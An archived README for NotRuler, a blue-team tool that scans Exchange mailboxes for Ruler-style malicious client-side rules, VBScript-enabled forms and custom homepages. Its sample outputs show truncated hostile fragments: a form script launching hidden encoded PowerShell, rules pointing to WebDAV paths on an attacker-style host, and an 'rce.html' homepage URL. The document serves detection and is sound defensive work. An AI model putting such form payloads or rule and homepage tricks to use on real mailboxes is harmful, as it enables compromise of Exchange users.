{
	"id": "34131e00-b98c-447c-be64-a0b32e47ee8b",
	"created_at": "2026-04-06T02:11:27.006123Z",
	"updated_at": "2026-04-10T13:12:30.418652Z",
	"deleted_at": null,
	"sha1_hash": "f4babc5a8cfc597cbf3b381a9726d228196c5227",
	"title": "GitHub - sensepost/notruler: The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 66392,
	"plain_text": "GitHub - sensepost/notruler: The opposite of Ruler, provides blue\r\nteams with the ability to detect Ruler usage against Exchange.\r\nBy Etienne Stalmans\r\nArchived: 2026-04-06 01:54:04 UTC\r\nIntroduction\r\nNotRuler is the opposite of Ruler. The tool aims to make life a little easier for Exchange Admins by allowing for\r\nthe detection of both client-side rules and VBScript enabled forms. At a miminum this should allow for the\r\ndetection of all attacks created through Ruler.\r\nNotRuler allows you to interact with Exchange servers remotely, through either the MAPI/HTTP or RPC/HTTP\r\nprotocol.\r\nWhat does it do?\r\nNotRuler can query one or more Exchange mailboxes and detects client-side Outlook rules and VBScript enabled\r\nforms.\r\nAllows Exchange Admins to check for compromise\r\nCheck your own account for compromise\r\nExtract stager address for Malicious rules\r\nExtract VBScript used in forms\r\nCheck for 'homepage' and extract URL\r\nGetting Started\r\nCompiled binaries for Linux, OSX and Windows are available. Find these in Releases information about setting\r\nup Ruler from source is found in the [getting-started guide].\r\nNotRuler has two modes of operation:\r\nRules -- check for client-side rules\r\nForms -- check for VBScript enabled forms\r\nHomepage -- check for a custom homepage\r\nRules\r\nThe current version of NotRuler can check either a single or multiple mailboxes. These are supplied in the\r\nprogram arguments.\r\nTo check multiple mailboxes, create a file with one account per line:\r\nhttps://github.com/sensepost/notruler\r\nPage 1 of 4\n\njohn.ford@testdomain.com\r\nhenry.hammond@testdomain.com\r\njames.smith@testdomain.com\r\ncindy.shell@testdomain.com\r\nUsing the Exchange Admin account, you should be able to log into any mailbox on the Exchange server:\r\n./notruler --username exchangeadmin --mailboxes /path/to/mailbox.list rules\r\nYou can also check your own account by using --self\r\n./notruler --username john.ford@testdomain.com --mailbox john.ford@testdomain.com --self rules\r\nSample output:\r\n[+] Checking [john.ford@testdomain.com]\r\n[+] Found 5 rules\r\n[WARNING] Found client-side rule: [01000000d97851c4:pewpew3] Application: [\\\\myhost.somewhere.darkside.com\\dav\\m\r\n[WARNING] Found client-side rule: [01000000d97851b9:pewpew] Application: [\\\\myhost.somewhere.darkside.com\\dav\\ba\r\n[+] Checking [cindy.shell@testdomain.com]\r\n[+] No Rules Found\r\n[+] Checking [henry.hammond@testdomain.com]\r\n[+] No Rules Found\r\n[+] Checking [james.smith@testdomain.com]\r\n[+] No Rules Found\r\nForms\r\nSame as with Rules, you need to either have a list of mailboxes or a single mailbox to check. Simply swap \"rules\"\r\nfor \"forms\":\r\nUsing the Exchange Admin account, you should be able to log into any mailbox on the Exchange server:\r\n./notruler --username exchangeadmin --mailboxes /path/to/mailbox.list forms\r\nYou can also check your own account by using --self\r\n./notruler --username john.ford@testdomain.com --mailbox john.ford@testdomain.com --self forms\r\nSample output:\r\nhttps://github.com/sensepost/notruler\r\nPage 2 of 4\n\n[+] Checking [john.ford@testdomain.com]\r\n[WARNING] Found form with VBScript! [IPM.Note.badform]\r\n Function P()\r\nCreateObject(\"Wscript.Shell\").Run \"powershell.exe -NoP -sta -NonI -W Hidden -Enc WwBTAFkAUwB0AEUAbQAuAE4AZQBUAC4\r\n[+] Checking [cindy.shell@testdomain.com]\r\n[+] Checking [henry.hammond@testdomain.com]\r\n[+] Checking [james.smith@testdomain.com]\r\nHomepage\r\nAnd the same again, you need to either have a list of mailboxes or a single mailbox to check.\r\nUsing the Exchange Admin account, you should be able to log into any mailbox on the Exchange server:\r\n./notruler --username exchangeadmin --mailboxes /path/to/mailbox.list homepage\r\nYou can also check your own account by using --self\r\n./notruler --username john.ford@testdomain.com --mailbox john.ford@testdomain.com --self homepage\r\nSample output:\r\n[+] Checking [john.ford@testdomain.com]\r\n[WARNING] Found endpoint: http://attack.attackpew.com/rce.html\r\n[+] Webview is set as ENABLED\r\n[+] Checking [cindy.shell@testdomain.com]\r\n[+] Checking [henry.hammond@testdomain.com]\r\n[+] Checking [james.smith@testdomain.com]\r\nIOCs\r\nI've added a list of IOC's here: iocs.md\r\nFeel free to submit Issues/PRs with further IOCs!\r\nLicense\r\nLLiicceennssee CCCC BBYY--NNCC--SSAA 44..00\r\nNotRuler is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International\r\nLicense (http://creativecommons.org/licenses/by-nc-sa/4.0/) Permissions beyond the scope of this license may be\r\navailable at http://sensepost.com/contact/.\r\nhttps://github.com/sensepost/notruler\r\nPage 3 of 4\n\nSource: https://github.com/sensepost/notruler\r\nhttps://github.com/sensepost/notruler\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://github.com/sensepost/notruler"
	],
	"report_names": [
		"notruler"
	],
	"threat_actors": [],
	"ts_created_at": 1775441487,
	"ts_updated_at": 1775826750,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f4babc5a8cfc597cbf3b381a9726d228196c5227.pdf",
		"text": "https://archive.orkl.eu/f4babc5a8cfc597cbf3b381a9726d228196c5227.txt",
		"img": "https://archive.orkl.eu/f4babc5a8cfc597cbf3b381a9726d228196c5227.jpg"
	}
}